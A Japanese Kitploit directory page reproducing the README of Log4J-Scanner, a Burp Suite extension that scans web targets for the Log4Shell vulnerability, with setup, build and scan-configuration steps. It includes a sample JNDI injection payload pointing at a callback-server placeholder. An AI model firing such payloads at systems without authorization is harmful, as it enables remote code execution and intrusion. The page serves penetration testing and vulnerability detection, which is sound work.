Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Log4J-Scanner — Log4Shell (CVE-2021-44228) 脆弱性を認証前および認証後にスキャンするBurp拡張機能。 | Kitploit
ツール/GitHubGitHub/0xdexter0us/log4j-scanner
脆弱性スキャナーウェブ脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHub0xdexter0us/log4j-scanner

Log4J-Scanner

Log4Shell (CVE-2021-44228) 脆弱性を認証前および認証後にスキャンするBurp拡張機能。

リポジトリを見る
102244年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

log4j

カスタムペイロードを使用してLog4Shell(CVE-2021-44228)の脆弱性をスキャンするBurp拡張機能。



免責事項

私はあなたの行動、Burp Suiteのフリーズ、ターゲットのハッキング、核戦争、またはこれらの指示に従ったことによって引き起こされる現在の経済危機について責任を負いません。あなたはこのツールを使用することを選択しており、もし何か問題が発生した際に私を非難するなら、私は笑うでしょう。


Usage Gif

手順:

  • 拡張機能をプリコンパイル済みリリースからインストールするか、ソースからビルドしてください。
  • アクティブスキャン++、Burp Bounty Pro、param-miner などの他のアクティブスキャン拡張機能をすべて無効/チェック解除してください。
  • トップメニューから Log4J Scanner の設定を開きます。
  • カスタムペイロードを追加し、設定を保存します。
  • ターゲットを選択 > 右クリック > Scan を選択。
  • Scan Configuration > Select from library を選択。
  • Audit checks - extensions only のみを選択し、OK ボタンをクリックします。

Silent Signal 氏に特別な感謝を。手順とスキャン設定は彼の拡張機能に触発されています。

覚えておくべき重要な手順:

  • カスタムペイロードには、あなたのコラボレーターURLを 追加しないでください。代わりにプレースホルダーとして [collaborator-server] を追加してください。
  • [collaborator-server] は、あなたのコラボレーターサーバーのURLに自動的に置き換えられます。
  • ペイロード例: "${jndi:ldap://[collaborator-server]/a}

ダウンロードリリース

https://github.com/0xDexter0us/Log4J-Scanner/releases/

ソースからビルド

  • ./gradlew build fatJar
  • build/libs/Log4J-Scanner-x.x.x.jar のjarファイルを取得

インストール

  1. リリースから最新のjarをダウンロードするか、ソースからビルドします。
  2. jar を Burp Suite に追加します。

このプロジェクトが気に入ったら、リポジトリにスターを付けてください! <3

リソース

  • パッシブスキャン用: https://github.com/f0ng/log4j2burpscanner
  • アクティブスキャン用: https://github.com/albinowax/ActiveScanPlusPlus および https://github.com/silentsignal/burp-log4shell

変更履歴

2021年12月25日 - v0.2.0

  • Burp Collaborator APIを追加。
  • カスタムスキャナーを削除。
  • BurpスキャナーAPIを追加。

2021年12月13日 - v0.1.0

  • 初の公開リリース

謝辞

  • CoreyD97 - https://github.com/CoreyD97
  • Silent Signal - https://github.com/silentsignal

これは私が1日でコーディングした初期リリースです。バグが発生する可能性があります。バグ報告、提案、プルリクエストは大歓迎です :)


Join our Discord server!

ko-fi

ツールをダウンロード